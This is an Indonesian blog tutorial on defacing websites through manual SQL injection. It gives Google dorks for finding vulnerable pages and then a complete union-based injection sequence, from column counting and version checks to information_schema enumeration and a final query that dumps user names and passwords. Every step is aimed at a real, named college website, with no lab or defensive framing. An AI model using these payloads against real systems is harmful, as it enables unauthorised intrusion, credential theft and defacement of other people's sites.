Deface sql injection manual

Kembali lagi gais sama gue galehdotid :v gue belum sempet bikin tutor lagi karena banyak acara di sekolah gue :v

Tutorial kali ini adalah Deface teknik sql injeksion manual :v mungkin bisa di sebut cara curry user sama pasword  sebenarnya gue mau dari kmren bikin ini tutorial tapi males panjang kali ini karna gue udh beberapa hari gx nuliis di blog w bikin tutorail nya aja :v

langsung aja 

bahan-bahan

-browser

-usaha

saya akan menjelaskan nya perlahan lahan biar kelen yang baca paham :v

1.pertama-tama lu harus dorking di google dulu 

Dork nya :

inurl /school.php id=

inurl product.php id=

inurl galery.php id=

2.Tambahin target kalian dengan tanda kutip seperti di bawah ini 

http://www.maldacollege.ac.in/current-news.php?id=35'

Nah seperti contoh di atas kalo vuln  akan muncul gambar di bawah 

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''147''' at line 1

3.Nah lang kah berikutnya adalah kita mencari error nya ada di nomor berapa kita coba dengan mengunakan perintah :v 

 order+by+

http://www.maldacollege.ac.in/current-news.php?id=-35+order+by+1-- < tidak error

http://www.maldacollege.ac.in/current-news.php?id=-35+order+by+2--  < tidak error

http://www.maldacollege.ac.in/current-news.php?id=-35+order+by+3--  < tidak error

http://www.maldacollege.ac.in/current-news.php?id=-35+order+by+4--  <tidak error

http://www.maldacollege.ac.in/current-news.php?id=-35+order+by+5-- <error

Nah setelah di dump ternyata error di angka lima :v berarti jumlah database nya ada 4 

4.cara selanjut nya iyalah kita gunakan Perintah union+select  liat cara nya di bawah 

http://www.maldacollege.ac.in/current-news.php?id=-35+union+select+1,2,3,4--

nah kita coba seperti itu :v ntar muncul angka kayak di gambar 

5.nah sekarang kita tambahkan perintah @@version atau version()  buat liat versi berapa sql nya 

karna gue muncul nya di angka dua brarti menambahkan @@version nya di angka dua jadi seperti ini :

http://www.maldacollege.ac.in/current-news.php?id=-35+union+select+1,@@version,3,4--

Karna yang muncul versi 5 berung sekali kelen karena kalo versi 4 susah jinx :v

6.Sekarang kita tambahkan perintah seperti di bawah nih 

Menambahkan perintah group_concat(table_name) di angka muncul tadi dan

perintah +from+information_schema.tables+where+table_schema=database()--

di akhir angka jadi macam nih 

http://www.maldacollege.ac.in/current-news.php?id=-35+union+select+1,group_concat(table_name),3,4+from+information_schema.tables+where+table_schema=database()--

Muncul table bnyak setelah itu kita pilih yang mau di dump yang mana dan di tahap ini kalian harus 

mengextrak kata yang mau di dum database nya ke hexadecimal 

misal nya gue di sini mau dump user_details setelah di extrake hexa decimal adalah 757365725f64657461696c73

cara extraxk nya sini  http://string-functions.com/string-hex.aspx

nah seperti itu sekrang kita lanjut ke perintah nya adalah seperti di bawah ini 

group_concat(column_name) <yang tadi nya table ganti jadi column dan di akhir angak tambahin

from+information_schema.columns+where+table_name=0xhasil luextra tadi--

jangan lupa mengugunakan 0x << itu 

http://www.maldacollege.ac.in/current-news.php?id=-35+union+select+1,group_concat(column_name),3,4+from+information_schema.columns+where+table_name=0x757365725f64657461696c73--

Nah muncul table yang w dump tadi  sekrang kita pakai  lihat daleman nya cara nya adalah 

concat_ws(0x3a,name_db,name_db) <yang tadi group concat ganti  jadi concat_ws 

+from+nameyang tadi di dumb--  < yang di akhir angka jadi seperti itu

http://www.maldacollege.ac.in/current-news.php?id=-35+union+select+1,concat_ws(0x3a,user_name,user_password),3,4+from+user_details--

muncul deh user sama pasword nya